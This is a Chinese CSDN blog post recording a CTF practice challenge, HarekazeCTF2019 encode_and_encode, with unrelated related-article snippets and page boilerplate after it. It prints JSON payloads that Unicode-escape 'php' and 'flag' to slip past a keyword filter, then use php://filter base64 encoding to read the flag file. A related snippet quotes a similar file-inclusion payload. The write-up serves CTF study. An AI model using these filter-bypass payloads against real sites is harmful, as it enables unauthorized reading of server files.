2021-06-19-2

最新推荐文章于 2022-04-22 19:18:11 发布
最新推荐文章于 2022-04-22 19:18:11 发布
阅读量164 收藏
点赞数
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44617902/article/details/118054508
版权

06/19刷题记录

BUU+WEB+[HarekazeCTF2019]encode_and_encode
关键字
  • php://input 读取POST数据
  • JSON(JavaScript Object Notation)轻量级的数据格式。
  • php://filter/伪协议
复现流程:

  1. 审计代码过滤了很多伪协议通过查询发现json_decode()会自动解析unicode编码将php flag字符用Unicode编码

    bp抓包修改为POST传参

    { "page" : "\u0070\u0068\u0070://filter/convert.base64-encode/resource=/\u0066\u006c\u0061\u0067"}

    也可以全部Unicode编码

{"page": "\u0070\u0068\u0070\u003a\u002f\u002f\u0066\u0069\u006c\u0074\u0065\u0072\u002f\u0063\u006f\u006e\u0076\u0065\u0072\u0074\u002e\u0062\u0061\u0073\u0065\u0036\u0034\u002d\u0065\u006e\u0063\u006f\u0064\u0065\u002f\u0072\u0065\u0073\u006f\u0075\u0072\u0063\u0065\u003d\u002f\u0066\u006c\u0061\u0067"}

总结

  1. php://input 读取POST传参

  2. json_decode()自动解析Unicode编码

  3. php://filter/read=convert.base64-encode/resource=XXX 以base64编码读取某个文件

te_mgl
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
app-privacy-report-2021-06-16-15-19.json
08-16
app-privacy-report-2021-06-16-15-19.json
2021/4/23爬虫第五次课(爬虫网络请求模块下下)
热门推荐
笔记本IT的博客
04-25 3万+
文章目录一、处理不信任的SSL证书的网站二、cookie三、session 一、处理不信任的SSL证书的网站 SSL证书 数字证书的一种 SSL服务器证书 遵守SSL协议 具有服务器身份验证和数据传输加密功能 在爬虫时可能会遇到这样的报错(SSLError)这说明我们要爬取的网站没有SSL证书 处理:res = requests.get(url,verify=False) 二、cookie 通过记录用户信息来确定身份 1 模拟登陆 #人人网保持登陆状态 import requests url = 'htt
BUUCTF PWN题刷题记录 (未完待续)
qq_41071646的博客
08-01 1968
最近找了一个新的CTF比赛平台 但是不知道为啥pwn的服务器总是连不上, 所以到时候还是直接本地打 默认2.23 so 如果 有高版本的话 我再切换,,, 逆向的话 先等等吧,,,先不刷。。等有空了再刷 第一题 连上就有flag的pwn 直接 运行就有权限,。 第二题 RIP覆盖一下 这个没有任何保护 直接 覆盖rip就可以了 from pwn import * conte...
[HarekazeCTF2019]Sqlite Voting
Jacob12774的博客
06-20 861
参考链接:https://www.cnblogs.com/20175211lyz/p/12264779.html 复现链接:https://buuoj.cn/challenges#[HarekazeCTF2019]Sqlite%20Voting 这里进去后发现有提供源代码,代码如下: <?php error_reporting(0); if (isset($_GET['source'])) { show_source(__FILE__); exit(); } function is_.
BUUCTF [ACTF2020 新生赛]Include
m0_49025459的博客
04-18 1179
题目 打开靶场 这是一个文件包含的题目,要尝试用php://filter来进行包含,这里用了Base64编码了,而后我们要构造 payload:?file=php://filter/read=convert.base64-encode/resource=flag.php 得到了Base64编码的flag,去在线的网站去解码就行了 ...
[BUUCTF-pwn] [HarekazeCTF2019]LoginSystem
weixin_52640415的博客
01-21 460
printf漏洞的fmtstr见得多了,scanf第一次见 while ( 1 ) { while ( 1 ) { while ( 1 ) { puts("Create an account first."); printf("# of charsets: "); __isoc99_scanf("%lu", &v5); getchar(); if ( v5 <=
Screenshot_2021-12-13-19-12-28-441_com.sm.tiktoktool.jpg
12-14
Screenshot_2021-12-13-19-12-28-441_com.sm.tiktoktool.jpg
Pipeline-Trigger-2021-04-06T19-27-21.114Z:为工具链创建
04-13
App4UITest 用于功能性End2End系统测试 部署和测试用Jade编写的节点应用程序
WebIDE-UISimpleTC-2021-04-06T06-19-20.427Z-github:为工具链创建
04-06
节点你好世界
5G-V2X技术逐步落地,“5G+工业互联网”发展取得积极成果[2021-06-22](19页).pdf
05-18
5G-V2X技术逐步落地,“5G+工业互联网”发展取得积极成果[2021-06-22](19页).pdf
n9e源码阅读-agent-3-添加agent上报信息
whz-emm的博客
03-24 1468
1. reportStart()函数上报本机信息给ams,从该函数开始 func main() { ... if config.Config.Enable.Report { reportStart() } ... 2. 定时循环上报 func reportStart() { go report.LoopReport() } func LoopReport() { duration := time.Duration(config.Config.Report.Inter..
BUUCTF--[HarekazeCTF2019]Easy Notes
qq_46263951的博客
08-07 431
<section> <h2>Get flag</h2> <p> <?php if (is_admin()) { echo "Congratulations! The flag is: <code>" . getenv('FLAG') . "</code>"; } else { echo "You are not an admin :("; } ?&gt.
常用user-agent 库最新整理 2021-03-15
jackbon8的博客
03-15 4741
最近要搜集网上 数据- 没错就是爬虫 为了避免被ban的风险 所以要设置代理ip 还有 user-agent 但是找了半天并没有详细的库 所以自己整理了一份 直接复制拿去用 赠人玫瑰 手有余香! USER_AGENTS = [ "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", "Mozil
[HarekazeCTF2019]Avatar Uploader 1
m0_63045593的博客
04-22 1147
[HarekazeCTF2019]Avatar Uploader 1 首先就是一个普通界面 常规思路看cookie 路径啥的都没有有用的信息 这个界面是可以直接登录的 题目中也给出了源码 首先 是基本的对图片的识别 最后获得flag的位置为size处也就是 getimagesize()函数的识别 在检查文件类型时,finfo_file()函数检测上传图片的类型是否是image/png 在检查文件长宽时,getimagesize() 函数用于获取图像大小及相关信息,成功将返回个数组 也就是说要finfo_
signature=9abcfd6b9fa1aeb46c90db58bb7dc716,yarn.lock
weixin_28878621的博客
05-29 6069
# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY.# yarn lockfile v1"@babel/runtime@^7.1.2":version "7.1.2"resolved "http://registry.npm.taobao.org/@babel/runtime/download/@babel/runtime...
毕业设计MATLAB_执行一维相同大小矩阵的QR分解.zip
05-27
毕业设计matlab
ipython-7.9.0.tar.gz
最新发布
05-27
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
debugpy-1.0.0b3-cp37-cp37m-manylinux2010_x86_64.whl
05-27
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
libaacs-devel-0.10.0-1.mga8.i586.rpm
05-27
rpm -i xx.rpm 只要报错遇到aacs的可以看看架构是否一致
结果是这样的,没有根据id排:start_date end_date 0 2020-01-15 2020-04-27 1 2020-09-30 2020-10-10 2 2021-02-07 2021-02-22 3 2021-03-06 2021-03-24 4 2020-01-21 2020-03-03 .. ... ... 639 2021-03-09 2021-03-18 640 2021-03-24 2021-04-01 641 2020-01-12 2020-04-19 642 2021-02-09 2021-02-18 643 2020-01-18 2020-03-09
06-03
如果你想根据企业id对结果进行排序,可以在输出结果之前加上一行代码: ```python result = result.sort_values(by=['id']) ``` 此代码将会根据id对结果进行排序,使得每个企业的结果排在一起。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值